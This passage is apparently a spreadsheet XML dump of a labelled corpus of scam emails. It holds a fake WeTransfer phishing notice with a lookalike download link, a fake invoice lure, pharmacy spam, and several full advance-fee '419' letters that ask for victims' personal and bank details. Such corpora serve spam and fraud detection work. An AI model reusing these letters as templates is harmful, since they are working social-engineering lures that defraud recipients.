    <t>files sent to   jose@monkey.org    12 files, 89 MB in total · Will be deleted on 12th December, 2019  Download files here    Thanks for using WeTransfer. We'll email you a confirmation as soon as your files have been downloaded.      Download link  [URL]https://crancbsu.com[/URL]     Recipients  jose@monkey.org               Message  Hi - please download files here. Thx.                        To make sure our emails arrive, please add noreply@wetransfer.com to your contacts.          Get more out of WeTransfer, get Plus  About WeTransfer   ·   Help   ·   Legal   ·   Report this transfer as spam files sent to  jose@monkey.org 12 files, 89 MB in total · Will be deleted on 12th December, 2019 Download files here Thanks for using WeTransfer. We'll email you a confirmation as soon as your files have been downloaded.    Download link [URL]https://crancbsu.com[/URL]   Recipients jose@monkey.org Message Hi - please download files here. Thx.    To make sure our emails arrive, please add noreply@wetransfer.com to your contacts. Get more out of WeTransfer, get Plus About WeTransfer   ·   Help   ·   Legal   ·   Report this transfer as spam</t>
  </si>
  <si>
    <t>https://crancbsu.com https://crancbsu.com</t>
  </si>
  <si>
    <t>41</t>
  </si>
  <si>
    <t>To: colibri@let.uu.nl\nFrom: Khalifa Sese &lt;kss07@go.com&gt;\nDate: Wed, 11 Dec 2002 05:23:51 -0800</t>
  </si>
  <si>
    <t>Wed, 11 Dec 2002 05:23:51 -0800</t>
  </si>
  <si>
    <t>Khalifa Sese &lt;kss07@go.com&gt;</t>
  </si>
  <si>
    <t>colibri@let.uu.nl</t>
  </si>
  <si>
    <t>ATTENTION</t>
  </si>
  <si>
    <t>REPLY TO : princekhalifa_mss2009@yahoo.co.uk\nCALL ME ON MY MOBILE PHONE NUMBER-234-8033254502\n\nATTENTION CEO/PRESIDENT\nI PRESUME THE RECEIPT OF THIS MESSAGE WILL BE A SURPRISE TO YOU, SINCE YOU HAVE NO KNOWLEDGE OF ME.\nI AM SON TO THE LATE PRESIDENT OF THE CONGO DEMOCRATIC REPUBLIC, FORMERLY ( MOBUTU SESE SEKO) WHO DIED OF A CANCEROUS DISEASE WHILE ON EXILE, AFTER BEING OVERTHROWN FROM GOVERNMENT BY THE REBEL(LATE LAURENT KABILA). \nSINCE THIS COUP D'ETAT, MY FATHER HAD GONE ON EXILE IN DIFFERENT COUNTRIES AND WE(THE CHILDREN)HAVE SINCE THEN LOST CONTACT OF EACH OTHER. PRESENTLY, I AM SEEKING ASYLUM IN NIGERIA WITH A CLOSE ASSOCIATE OF MY LATE FATHER, WHILE MY LIFE HAS BEEN THREATHENED AS I HAVE RECIEVED THREAT MESSAGES FROM ALLIES OF MY LATE FATHERS ENEMIES WHO ARE STILL IN TOP GOVERNMENT POSITIONS IN MY COUNTRY (ZAIRE). \nNOW, BEFORE THE OVERTHROWN OF MY FATHER, HE HAD ARRANGED FUNDS IN SAFE DEPOSITS WITH DIFFERENT SECURITY COMPANIES TO TAKE CARE OF HIS FAMILY, AS HE BELIEVED HE WOULD BE MURDERED SINCE ALL COUPS HERE IN AFRICA HAS ALWAYS RESORTED TO THE BRUTAL KILLING OF THE HEAD. \nTHE DOCUMENTS FROM THE SECURITY COMPANIES WHERE THE FUNDS ARE LODGE WERE SHARED AMONG THE MEMBERS OF THE FAMILY s BEFORE THE DEATH OF MY FATHER, HE HAD ADVISED US TO LOOK FOR FORIEGHN PARTNERS THAT WILL HELP US AND INVEST THE MONEY IN ORTHER NOT TO BE TRACED BACK FROM US AND ENDANGER OUR LIVES.\nI AM ALSO BEING PRESSURED HERE IN NIGERIA BY SOME GOVERNMENT OFFICIALS WHO ARE DEMANDING FOR THIS DOCUMENTS TO ASSIST ME, BUT I DO NOT TRUST THE NIGERIAN PEOPLE. WITH THIS FUNDS, WHICH IS $15M (FIFTEEN MILLION UNITED STATE DOLLARS) I INTEND BUYING A HOUSE IN YOUR COUNTRY AND INVESTING PART OF THE FUNDS INTO ANY LUCRATIVE BUSINESS VENTURE WITH YOUR ASSISTANCE. \nI WOULD ALSO LIKE US TO DISCUSS ON THE PERCENTAGE YOU CARE OVER THERE IN YOUR COUNTRY. FOR FURTHER BRIEFINGS, I WILL LIKE TO ACKNOWLEDGE YOUR RECEIPT OF THIS LETTER AND RESPONSE WITH YOUR TEL NUMBER &amp; FAX ADDRESS THROUGH MY PRIVATE E-MAIL ADDRESS THANKS IN ANTICIPATION FOR YOUR ASSISTANCE.\n \nYOUR FAITHFULLY, \n\nKHALIFA SESE SEKO \n\n\n\n\n\n___________________________________________________\nGO.com Mail                                    \nGet Your Free, Private E-mail at [URL]http://mail.go.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>346</t>
  </si>
  <si>
    <t>To: vinokoni5@hotmail.com\nFrom: vino koni &lt;vinokoni5@hotmail.com&gt;\nDate: Wed, 10 Sep 2003 11:53:42 +0200</t>
  </si>
  <si>
    <t>Wed, 10 Sep 2003 11:53:42 +0200</t>
  </si>
  <si>
    <t>vino koni &lt;vinokoni5@hotmail.com&gt;</t>
  </si>
  <si>
    <t>vinokoni5@hotmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">BUSINESS PROPOSAL  </t>
  </si>
  <si>
    <t>\n\n\n(vinokoni5@hotmail.com)\nFROM:MRVINO.F.KONI\nTEL.+27-82-679-3775\nFAX;+27-11-484-4082\nNO 25 CLAIM STREET Johannesburg\nSOUTH AFRICA\n\n\n\nDear SIR/MADAM,\n\nPeace and love of God be with You.I guess this letter may come to you as a \nsurprise since i had no previous correspondence with you.Please excuse me \nthe emberassment this letter might cause you and try to excesise a little \npatience in other to understand its content properly.\n\nI learnt that many Africans has used the advantage of what happened to us in \nmy country to deceive some innocent souls and may be some has even used my \nfathers name because of his purpularity and greatness.But what we all need \nto understand in this world is that everybody will answer for him or herself \non the last day.\n\nMy name is Mr VINO.F.KONI and i am the only son of my parents. Myfather is \nMr Johnson Koni and my mother is mrs Rose.s.Koni. I am a graduate of federal \nuniversity of science and technology Harare,Zimbabwe and my discipline is \nAgricultural engineering.After my graduation,I decided to work for my father \nas his manager.My father has two big farms that are well known in Zimbabwe \nand has many workers that were working for him.\n\nI managed my fathers farms for two years before we had in my country.I got \nyour contact through network online decided to write you to explain my \nsituation and request for your assistance.\n\nThis crises was as a result of a new land Act reform introduced by president \nRobert Mugabe which wholly affected most white farmers and few black \nfarmers.This resulted in the killing and mob action  by Zimbabwean war \nveterans and some lunatics in the society.Infact a lot of people were killed \nbecause of this land reform act of which my father was a victim.\n\nBut before the death of my father,  as if he knew he was going to die \ninformed me about the money he deposited with a security and finance firm in \nSouth Africa.The total amount is twenty three million,two hundred thousand \nPOUNDS (M23,200,000,POUNDS) and this money was deposited in a box as germ \nstones to avoid much demurrage from the Security and finance firm. This \namount was meant for the purchase of new machines and chemicals for the \nfarms and establishment of a new farm in Swaziland.\n\nOne month after my father's death,I and my mother decided to travell to \nSouth Africa for our lives and decided to look for a trustworthy foreigner \nwho will help us to transfer this money out of South Africa\nbecause we are staying as refugees here in South Africa and refugees are not \nalowed to open bank accounts or involved in any financial transaction in \nSouth Africa.I have all the documents concerning\nthis money and what i am seeking for is a genuine foreign account where this \nmoney could be transferred into without the knowledge of my government who \nare bent on collecting everything that belongs to my father.\n\nAll i am looking for is an honest business man or woman, whom I can entrust \nmy future and that of my family . I must also let you know that this \ntransaction is 100%risk free. If you accept to assist\nme and my family all I want from you is for you to make arrangements and \ncome to Johannesburg  South Africa, so that you can help me open a \nnonresident account in your name which will aid us in transferring the money \ninto any account you will nominate overseas.\n\nIf you are willing to help me,I have two options of compasaction for \nyou,firstly you can choose to have certain percentage of the money for \nnominating your account for this transaction, Or you can\ngo into partnership with me for the proper profitable investment of the \nmoney in your country. Which ever the option you chooses,feel free to notify \nme.\n\nI have also mapped out 5% of this money for all kinds of expenses we might \nincure in the process of this transaction. If you do not prefer a \npartnership I am willing to give you 25% of the money while the remaining \n70% will remain for me and my family.If you are realy capable and willing to \nassist me please contact me immediately through my direct telephone number \n+27-82-679-3775 or this e-mail address with which i have sent you this \nmessage.\n\nFinally, please treat this matter as urgent as to save my family from much \nexpences caused by demaurage being accumulating on daily bases for the money \nin the security company.Thanks for your mutual\nco-operation while i wait for your soonest response.Remain blessed.\n\nYours Faithfuly,\nMR VINO.F.KONI\n(for and on behalf of my family)\n(vinokoni5@hotmail.com)\n\n_________________________________________________________________\nRain coat or t-shirt?  Find out with MSN Weather \n[URL]http://www.msn.co.za[/URL]\n\n\n</t>
  </si>
  <si>
    <t>980</t>
  </si>
  <si>
    <t>To: nan\nFrom: lile34 &lt;lilesong56@3xl.net&gt;\nDate: Wed, 10 Nov 2004 05:24:48 -0800</t>
  </si>
  <si>
    <t>Wed, 10 Nov 2004 05:24:48 -0800</t>
  </si>
  <si>
    <t>lile34 &lt;lilesong56@3xl.net&gt;</t>
  </si>
  <si>
    <t>CAN YOU BE SINCERE?</t>
  </si>
  <si>
    <t>\nFROM:MR.LI LE SONG\nHang Seng Bank Ltd\nFu Shan Mansion\n25 Taikoo Shing Road\nTaikoo Shing Branch\nHong Kong.\n\n\nDear Sir,\n\n  I am Mr. Li Le Song credit officer of the Foriegn operations dept of the Hang Seng Bank Ltd,Taikoo Shing Branch.I have a obscured business suggestion for you.Before the U.S and Iraqi war our client Colonel sadiq uday who was with the Iraqi forces and also business man made a numbered fixed deposit for 18 calendar months, with a value of Nineteen millions Five Hundred Thousand United state Dollars only in my branch. Upon maturity several notice was sent to him, even during the war early this year. Again after the war another notification was sent and still no response came from him. We later find out that the colonel and his family had been killed during the war in bomb blast that hit their home.After further investigation it was alsO discovered that Colonel Sadiq Uday did not declare any next of kin in his,official papersincluding the paper work of his bank deposit. And he also confided in me the last time he was at my office that no one except me knew of his deposit in my \n bank. So, Nineteen millions Five Hundred Thousand United State Dollars is still lying in my bank and no one will ever come forward to claim it, What bothers me most is that according to the to the laws of my country at the expiration 3 years and 6 month the funds will revert to the ownership of the Hong Kong Government if nobody applies to claim the funds.Against thisbackdrop, my suggestion to you is that I will like you as a foreigner to stand as the next of kin to Colonel Sadiq Uday so that you will be able to receive his funds.\n\nWHAT IS TO BE DONE:\n\n\n I want you to know that I have had everything planned out so that we shall come out successful. I have contacted an attorney that will prepare the necessary document that will back you up as the next of kin to Colonel Sadiq Uday,all that is required from you at this stage is for you to provide me with your Full Names and Address so that the attorney can commence his job. After you have been made the next of kin, the attorney will also fill in for claims on your behalf and secure the necessary approval and letter of probate in your favor for the move of the funds to an account that will be provided by you.There is no risk involved at all in the matter as we are going adopt a legalized method and the attorney will prepare all the\nnecessary documents.Please endeavor to observe utmost discretion in all matters concerning this Issue.Once the funds have been transrred to your nominated bank account the sharing ratio is open for negotiation for you. Should, you be interested please! send me your full names andcurrentresidential address and I will prefer you to reach me on the email address(lilesong56@3xl.net) and finally after that i shall provide you with more details of this operation.Your earliest response to this letter will be appreciated.\n\n Kind Regards\n\nMr.Li Le Song\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site colonialspacemarines.com\n- [URL]http://colonialspacemarines.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://colonialspacemarines.com</t>
  </si>
  <si>
    <t>5171</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@netnoteinc.com&gt;\nFrom: ross9917@Flashmail.com\nDate: Wed, 10 Jul 2002 04:09:18 -0700</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 04:09:18 -0700</t>
  </si>
  <si>
    <t>ross9917@Flashmail.com</t>
  </si>
  <si>
    <t>&lt;Undisclosed.Recipients@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Order Viagra Online - Safely &amp; Securely              HNWGYI</t>
  </si>
  <si>
    <t>\n\n![](3D"[URL]http://www.hebalist.com[/URL]")  \n  \n---  \n  \n![](3D"[URL]http://www.hebalist.com[/URL]")  \n![](3D"[URL]http://www.hebalist.com[/URL]")  \n  \n---  \n  \n![](3D"[URL]http://www.hebalist.com[/URL]")  \n  \n---\n\n</t>
  </si>
  <si>
    <t>http://www.hebalist.com http://www.hebalist.com http://www.hebalist.com http://www.hebalist.com</t>
  </si>
  <si>
    <t>500</t>
  </si>
  <si>
    <t>To: R@M\nFrom: her29@rediffmail.com\nDate: Wed, 10 Dec 2003 05:17:02 +0000</t>
  </si>
  <si>
    <t>Wed, 10 Dec 2003 05:17:02 +0000</t>
  </si>
  <si>
    <t>her29@rediffmail.com</t>
  </si>
  <si>
    <t>SINGAPORE URGENT</t>
  </si>
  <si>
    <t>Heru Nurwarsito\nCol (Ret) David Wong.\nOCBC Bank\nSingapore.\n[URL]www.ocbc.com[/URL]\nPRIVATE AND URGENT.\nI am contacting you on a business transfer of a hugh sum of money from a deceased account. Though I know that a transaction of this magnitude will make any one apprehensive and sceptical, but I am assuring you that its been accurately planned and will be carried out successfully with your full cooperation as long as you follow our plans and instructions religiously. We decided to contact you due to the urgency of this transaction.\nPROPOSITION;\nWe discovered an abandoned sum of US$25,500,000.00 ( twenty million five hundred thousand united states dollars) in an account that belongs to one of our foreign customers who died along with his entire family. Since his death, none of his next-of-kin or relations has come forward to lay claims for this money as the heir. We cannot release the fund from his account unless someone applies for claim as the next-of-kin to the deceased as indicated in our banking guidelines. Upon this discovery, we now seek your permission\nto have you stand as a next of kin to the deceased as all documentations will be carefully worked out by us for the funds (US$25,500,000.00) to be released in your favour as the beneficiary's next of kin through my banks funds managers/clearing house overseas. It may interest you to know that we have secured from\nthe probate an order of madamus to locate any of deceased beneficiaries. Please acknowledge receipt of this message in acceptance of our mutual business endeavour by furnishing me with the following;\n1. Beneficiary Name and Address.\n2. Direct Telephone and fax numbers.\nThese requirements will enable us file letter of claim to the appropriate departments for necessary approvals in your favour before the transfer can be made. We shall be\ncompensating you with two million dollars on final conclusion of this project, while the rest shall be for us. Your share stays while the rest shall be for us for investment purposes.\nIf this proposal is acceptable by you, do not take undue advantage of the trust we have bestowed in you,please contact me directly as i await your urgent mail.\nRegards,\nHeru.\nCol. Wong\n\n</t>
  </si>
  <si>
    <t>www.ocbc.com</t>
  </si>
  <si>
    <t>499</t>
  </si>
  <si>
    <t>To: dr_usmanbello@fsmail.net\nFrom: DR USMAN BELLO &lt;dr_usmanbello@fsmail.net&gt;\nDate: Wed, 10 Dec 2003 01:47:54 +0100</t>
  </si>
  <si>
    <t>Wed, 10 Dec 2003 01:47:54 +0100</t>
  </si>
  <si>
    <t>DR USMAN BELLO &lt;dr_usmanbello@fsmail.net&gt;</t>
  </si>
  <si>
    <t>dr_usmanbello@fsmail.net</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR. USMAN BELLO</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR. USMAN BELLO\nUNION BANK PLC\nMy name is Usman Bello the manager, credit and foreign bills of Union Bank Nigeria Plc. I am writing in respect of a foreign customer of my bank with account number 14-255-2004/utb/t who perished in a plane crash Korean Air Flight 801] with the whole passengers aboard on August 6,1998.\nSince the demise of this client customer, I personally have watched with keen interest to see the next of kin but all has proved abortive as no one has come to claim his funds of USD$.30 m, [Thirty million United States dollars] which has been with my branch for a very long time. On this note, I decided to seek for a foreigner who I can present as the next of kin hence no one has come up to be the next of kin.\nAnd the banking ethics here does not allow such money to stay more Than five years, after which the money will be called into the bank treasury as unclaimed funds after this period. In view of this I got your contact from a business contact enquiry. Note that you do not need to have similar names with the late beneficiary. I will give you 25% of the total. Upon the receipt of your response, I will commence on manipulating your information into the file as the next of kin and I will send you information on how we intend to actualize our objective in a legal manner.\nI will not fail to bring to your notice that this business is hitch free and that you should not entertain any fear as all modalities for fund transfer can be finalized within five banking days, after your claim is established as the certified next of kin to\nThe deceased. \nWhen you receive this letter. Kindly, send me your private Tel/Fax Numbers for quick communication through my private email box at dr_usmanbello20033@yahoo.com\nAwaiting your favorable response.\nYours truly,\nDr. Usman Bello \nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>1027</t>
  </si>
  <si>
    <t>To: "Stroman Inc, Alvis Miller" &lt;jose@monkey.org&gt;\nFrom: Monkey - Account Manager &lt;jun.zheng@byd.com&gt;\nDate: Wed, 1 May 2019 09:05:04 -0500</t>
  </si>
  <si>
    <t>Wed, 1 May 2019 09:05:04 -0500</t>
  </si>
  <si>
    <t>Monkey - Account Manager &lt;jun.zheng@byd.com&gt;</t>
  </si>
  <si>
    <t>"Stroman Inc, Alvis Miller" &lt;jose@monkey.org&gt;</t>
  </si>
  <si>
    <t>Paid Invoice &amp; Credit Card Receipt</t>
  </si>
  <si>
    <t>Load instructions attached A printer friendly attachment is now included with each email.Click on the attachment to open or save the printer friendly version of your report. [URL]http://monkey.org[/URL] Monkey commercial@monkey.org</t>
  </si>
  <si>
    <t>http://monkey.org</t>
  </si>
  <si>
    <t>1566</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr.Scott Reed &lt;agile-scott@hotmail.com&gt;\nDate: Wed, 09 Nov 2005 12:16:08 +0000</t>
  </si>
  <si>
    <t>Wed, 09 Nov 2005 12:16:08 +0000</t>
  </si>
  <si>
    <t>Mr.Scott Reed &lt;agile-scott@hotmail.com&gt;</t>
  </si>
  <si>
    <t>ATTN:Respond Urgently !</t>
  </si>
  <si>
    <t>FROM:MR Scott Reed\n\nDear Sir/Madam,\n\nI know this email will reach you as a surprise,but need not to\nworry as i am using the only secured and confidential medium\navailable to seek for foreign assistance in a business transaction.\n\nI am Mr. Scott Reed from the BANK OF AFRICA. PLC,COTONOU-REPUBLIC\nOF BENIN.Branch.This business request may seem strange, but I crave\nyour indulgence and pray you view it seriously as I am convinced\nthat you would be capable to provide me with a solution to a money\ntransfer.\n\nOn August, 2002, a retired Atlanta physician Mr George Brumley Jr\nmade a numbered  time (fixed) deposit for twelve calendar months,\nvalued at nine million pound sterlin(9.000,000) in my branch\nupon maturity. I sent a routine notification to his forwarding\naddress but got no reply. After a month, we sent a reminder and\nfinally we discovered from his contract employers, that the Atlanta\nphysician Mr George Brumley Jr and his family died in the plane\ncrash On july ,2003.See site below for confirmation of the death.\nMay there Gentle soul rest in peace.\n\n[URL]http://www.cnn.com[/URL]\n\nOn further investigation, I found out that he died alongside with\nhis next of kin and attempts to trace his further next of kin were\nfruitless.\n\nSince we got information about his death, we have been expecting\nhis extended next of kin (family members)to come over and claim his\nmoney because we cannot release it unless some body applies for it\nas next of kin or relation to the  deceased as indicated in our\nbanking guidlines and laws but unfortunately  we learnt that all his\nsupposed next of kin or relation died alongside with him at the\nplane crash leaving nobody behind for the claim. This sum of\n9.000,000 and the interest is being rolled over with the principal\nsum at the end of each year . If no one ever come forward to claim it\naccording to African law, at the expiration of (four)years,the money\nwill revert to the ownership of the Benin Government if nobody applies\nto claim the fund.\n\nConsequently, my proposal to you is that I will like you to stand as\nthe next of kin to Mr George Brumley Jr and claim this funds so that\nthe fruit of the old man's labor will not get into the hands of some\ncorrupt Government officials. This is simple, I will like you to\nprovide immediately your full name and address so that i can apply for\nan Attorney on your behalf who will prepare the necessary documents and\naffidavits which will put you in place as the next of kin.We shall\nemploy the service of a probate attorney for the drafting and\nnotarization of the Will and obtain the necessary documents and letter\nof probate administration in your favour for the transfer. Any bank\naccount in any part of the world which you will provide will then\nfacilitate the transfer of this money to you as the beneficiary/next of\nkin.The money will be paid into your account for us to share in ratio\nof  40% for me and 40% for you and 10% will be set aside for expenses\nincured during the process while the other 10% will be given to charity\norganisation.There is no risk at all;the paperwork for this transaction\nwill be done by the attorney and my position as the banks branch Bills\nand Exchange Manager guarantees the successful execution of this\ntransaction.\n\nIf you are interested, please reply immediately via my private email\naddress below .Upon your response,I shall provide you with more details\nand relevant documents that will help you understand the transaction.\n\nPlease observe utmost confidentiality and be rest assured that this\ntransaction would be most profitable for both of us because I shall\nrequire your assistance to invest my share in your country.\nPlease upon the receipt of this mail message, send to me the following\nto enable me start the processing of the fund transfer:\n  1.) Your full name and address.\n  2.) Your private / official telephone and fax number.\nAwaiting your positive response via my private email:mrscottreed@walla.com\nor you can call me on my private telephone number:+22995713752 .\n\nThanks and God bless,\nMR SCOTT REED\nBILL AND EXCHANGE MANAGER\nFOREIGN REMITTANCE DEPT:\nBANK OF AFRICA PLC.\nCOTONOU-BENIN.Branch.\nEmail:mrscottreed@walla.com\n\n\n\n\n</t>
  </si>
  <si>
    <t>3073</t>
  </si>
  <si>
    <t>To: nan\nFrom: dan wahili &lt;dwahili054@hotmail.com&gt;\nDate: Wed, 09 May 2007 10:04:38 +0000</t>
  </si>
  <si>
    <t>Wed, 09 May 2007 10:04:38 +0000</t>
  </si>
  <si>
    <t>dan wahili &lt;dwahili054@hotmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT RESPONSE!!!</t>
  </si>
  <si>
    <t>FROM:MR.DAN WAHILI.\nAFRICAN DEVELOPEMENT BANK\nBURKINA FASO (ADB)\nOUAGADOUGOU-BURKINA FASO.\n\nDEAR FRIEND,\n\n\nIT WILL BE A SURPRISE FOR YOU TO RECEIVE THIS MAIL. WELCOME THIS LETTER IN \nTHE NAME OF ALLAH.\n\nI AM MR.DAN WAHILI,THE DIRECTOR OF THE ACCOUNTS &amp; AUDITING DEPT.AT THE \nAFRICAN DEVLOPEMENT BANK OUAGADOUGOU-WEST AFRICA. WITH DUE RESPECT I HAVE \nDECIDED TO CONTACT YOU ON A BUSINESS TRANSACTION THAT WILL BE BENEFICIAL TO \nBOTH OF US. AT THE BANK'S LAST ACCOUNTS/AUDITING EVALUATIONS,MY STAFFS CAME \nACROSS AN OLD ACCOUNT WHICH WAS BEING MAINTAINED BY A FOREIGN CLIENT WHO WE \nLEARNT WAS AMONG THE DECEASED PASSENGERS OF AN AIRLINE CRASH ON 6TH NOV. \n2003.SINCE THE DECEASED WAS UNABLE TO RUN THIS ACCOUNT SINCE HIS DEATH.THE \nACCOUNT HAS REMAINED DORMANT WITHOUT THE KNOWLEDGE OF HIS FAMILY SINCE IT \nWAS PUT IN A SAFE DEPOSIT ACCOUNT IN THE BANK FOR FUTURE INVESTMENT BY THE \nCLIENT. SINCE HIS DEMISE,NOBODY,NOT EVEN THE MEMBERS OF HIS FAMILY HAVE \nAPPLIED FOR CLAIMS OVER THIS FUND AND IT HAS BEEN IN THE SAFE DEPOSIT \nACCOUNT UNTIL WE DISCOVERED THAT IT CANNOT BE CLAIMED SINCE OUR CLIENT IS A \nFOREIGN NATIONAL AND WE ARE SURE THAT HE HAS NO NEXT OF KIN HERE TO FILE \nCLAIMS OVER THE MONEY.AS THE DIRECTOR OF THE DEPT,THIS DISCOVERY WAS BROUGHT \nTO MY OFFICE SO AS TO DECIDE WHAT IS TO BE DONE.WITH THE FEW PERSONEL IN MY \nDEPT,WE DECIDED TO SEEK WAYS THROUGH WHICH TO TRANSFER THIS MONEY OUT OF THE \nBANK AND OUT OF THE COUNTRY TOO.\n\nTHE TOTAL AMOUNT IN THE ACCOUNTS IS TEN MILLION FIVE HUNDRED THOUSAND \nDOLLARS(USD 10,500,000.00).WITH OUR POSITIONS AS STAFFS OF THE BANK,WE ARE \nHANDICAPPED BECAUSE WE CANNOT OPERATE FOREIGN ACCOUNTS AND CANNOT LAY \nBONAFIDE CLAIM OVER THIS MONEY.WHILE WE WERE CONTEMPLATING ON WHAT TO DO,A \nFRIEND OF MINE WHO WORKS WITH THE CHAMBER OF COMMERCE AND INDUSTRY \nRECOMMENDED YOUR PERSONALITY TO ME AND ADVISED I SHOULD ASK YOU FOR HELP TO \nTRANSFER THIS MONEY OUT OF THE COUNTRY.THE CLIENT IS A FOREIGN NATIONAL AND \nYOU WILL ONLY BE ASKED TO ACT AS HIS NEXT OF KIN AND I WILL SUPPLY YOU WITH \nALL THE NECESSARY INFORMATIONS AND BANK DATA TO ASSIST YOU IN BEING ABLE TO \nTRANSFER THIS MONEY TO ANY BANK OF YOUR CHOICE WHERE THIS MONEY COULD BE \nTRANSFERED INTO.\n\nI AND MY PARTNERS HAVE DECIDED TO GIVE AWAY FOURTY %(40%)TO YOU FOR YOUR \nASSISTANCE AND TEN (10%) FOR ANY EXPENSES THAT MIGHT ARISE DURING THE \nTRANSACTION OF THIS TRANSFER.WE WANT TO ASSURE YOU THAT THIS TRANSACTION IS \nABSOLUTELY RISK FREE SINCE WE WORK IN THIS BANK WHICH IS WHY YOU SHOULD BE \nCONFIDENT IN THE SUCCESS OF THIS TRANSACTION BECAUSE YOU WILL BE UPDATED \nWITH INFORMATION AS AT WHEN DESIRED.\n\nWE WILL PLEASE WISH YOU KEEP THIS TRANSACTION SECRET AS WE ARE HOPING TO \nRETIRE WITH OUR SHARE OF THIS MONEY AT THE END OF TRANSACTION WHICH WILL BE \nWHEN THIS MONEY IS SAFELY IN YOUR ACCOUNT. WE WILL THEN COME OVER TO YOUR \nCOUNTRY FOR SHARING ACCORDING TO THE PREVIOUSLY AGREED PERCENTAGES.YOU MIGHT \nEVEN HAVE TO ADVISE US ON POSSIBILITIES OF INVESTMENT IN YOUR COUNTRY OR \nELSEWHERE OF OUR CHOICE.MAY ALLAH HELP YOU TO HELP US TO A RESTIVE\nRETIREMENT.AMIN.\n\nPLEASE FOR FURTHER INFORMATIONS AND ENQUIRIES FEEL FREE TO CONTACT ME \nTHROUGH MY NUMBER 00 226 78 84 92 06 FOR ORAL DISCUSSION.\n\nAM AWAITING FOR YOUR URGENT RESPONSE!!!\n\nTHANKS AND REMAIN BLESSED.\n\nMR.DAN WAHILI\n\n_________________________________________________________________\nMSN Hotmail : crez votre adresse e-mail gratuite &amp;  vie ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1172</t>
  </si>
  <si>
    <t>To: R@M\nFrom: MR. KIMAEVA LIOUDMILA &lt;kim@netscape.net&gt;\nDate: Wed, 09 Mar 2005 12:25:20 -0800</t>
  </si>
  <si>
    <t>Wed, 09 Mar 2005 12:25:20 -0800</t>
  </si>
  <si>
    <t>MR. KIMAEVA LIOUDMILA &lt;kim@netscape.net&gt;</t>
  </si>
  <si>
    <t>PROPOSAL</t>
  </si>
  <si>
    <t>I am MR. KIMAEVA LIOUDMILA,the personal accountant to Mikhail Khodorkovsky the richest Person in Russia and owner of the following companies: Chairman CEO: YUKOS OIL (Russian Largest Oil Company) Chairman CEO: Menatep SBP Bank (A well reputable financial institution with its branches all over the world). I seek your partnership to accommodate the sum US$423M for us. My Boss got arrested for his involvement on politics in financing the leading and opposing political parties (the Union of Right Forces, led by Boris Nemtsov, and Yabloko, a liberal/social democratic party led by Gregor Yavlinsky) which posed treat to President Vladimir Putin second tenure as Russian president before he was reelected On March 14, 2004. You can catch more of the story on this websites &lt;&lt;" href="[URL]http://newsfromrussia.com[/URL]" target=_blank[URL]http://newsfromrussia.com[/URL]&gt;&gt; &lt;&lt;" href="[URL]http://www.themoscowtimes.com[/URL]" target=_blank[URL]http://www.themoscowtimes.com[/URL]&gt;&gt; &lt;&lt;" href="[URL]http://www.mosnews.com[/URL]" target=_blank[URL]http://www.mosnews.com[/URL]&gt;&gt; &lt;&gt; tm?1c &lt;&lt;" href="[URL]http://news.bbc.co.uk[/URL]" target=_blank[URL]http://news.bbc.co.uk[/URL]&gt;&gt; &lt;&lt;" href="[URL]http://money.cnn.com[/URL]" target=_blank[URL]http://money.cnn.com[/URL]&gt;&gt; &lt;&lt;" href="[URL]http://washingtontimes.com[/URL]" target=_blank[URL]http://washingtontimes.com[/URL]&gt;&gt; &lt;&lt;" href="[URL]http://www.forbes.com[/URL]" target=_blank[URL]http://www.forbes.com[/URL]&gt;&gt; &lt;&lt;" href="[URL]http://www.newratings.com[/URL]" target=_blank[URL]http://www.newratings.com[/URL]&gt;&gt; &lt;&lt; tml&gt;&gt; &lt;&lt;" href="[URL]http://www.washingtonpost.com[/URL]" target=_blank[URL]http://www.washingtonpost.com[/URL]&gt;&gt; The fund (US$423M) in question was approved by the Government of Russia for payment of various YUKOS OIL contractors/suppliers to prevent them from loosing the money they invested in the numerous contracts they executed for the above firm. The Government had already concluded plans to freeze all the accounts in my boss name (Mikhail Khodorkovsky) both corporate and personal and have on the 18th of October 2004 decided to sell off the assets of all Yukos Oil corporation at a give-away amount to pay the allege taxes which the company owed the Russian Government.refer to the website again. Everybody in the world know that this is a political vendetta to ensure that Mikhail Khodorkovsky comes out of detention as poor and broken man and his companiesare liquidated, that if he is not eventually sent to jail for tax evasion. The Accountant General of YUKOS OIL (who is also my partner in this transaction) and I have decided to raise a memo stating that YUKOS OIL owe contractors the above amount which was finally approved for payment after some deliberations. Actually, we have paid all our contractors both local and foreign because they agitated for their payments when they heared that my boss was arrested and might eventually be jailed by the RussianGovernment. YOUR ROLE: I will present you/your company as one of the contractors we are owing so that you can stand as the beneficiary of the above quoted sum or part of the fund according to your financial strength or the strength of your company. I will arrange for the documentation which the payee bank will need to transfer the sum to you. The transaction has to be concluded before as soon as possible. You will be rewarded with 10% of the total sum for your partnership. Can you be my partner on this? If this proposal is acceptable to you, Please send me your direct and private, telephone and fax number and email address to enable me furnish you with more information as we intend to conclude the transfer within 14 working days. N/B:DO MAKE DIRECT CONTACT TO ME VIA THIS EMAIL ADDRESS: kimmilamilakim@netscape.net Regards MR.KIMAEVA LIOUDMILA</t>
  </si>
  <si>
    <t>http://newsfromrussia.com http://newsfromrussia.com http://www.themoscowtimes.com http://www.themoscowtimes.com http://www.mosnews.com http://www.mosnews.com http://news.bbc.co.uk http://news.bbc.co.uk http://money.cnn.com http://money.cnn.com http://washingtontimes.com http://washingtontimes.com http://www.forbes.com http://www.forbes.com http://www.newratings.com http://www.newratings.com http://www.washingtonpost.com http://www.washingtonpost.com</t>
  </si>
  <si>
    <t>1123</t>
  </si>
  <si>
    <t>To: Ed Mellors &lt;jennifer@eecs.UM&gt;\nFrom: mohammad urban &lt;devamatar@members.vrna.org&gt;\nDate: Wed, 09 Feb 2005 03:47:35 -0500</t>
  </si>
  <si>
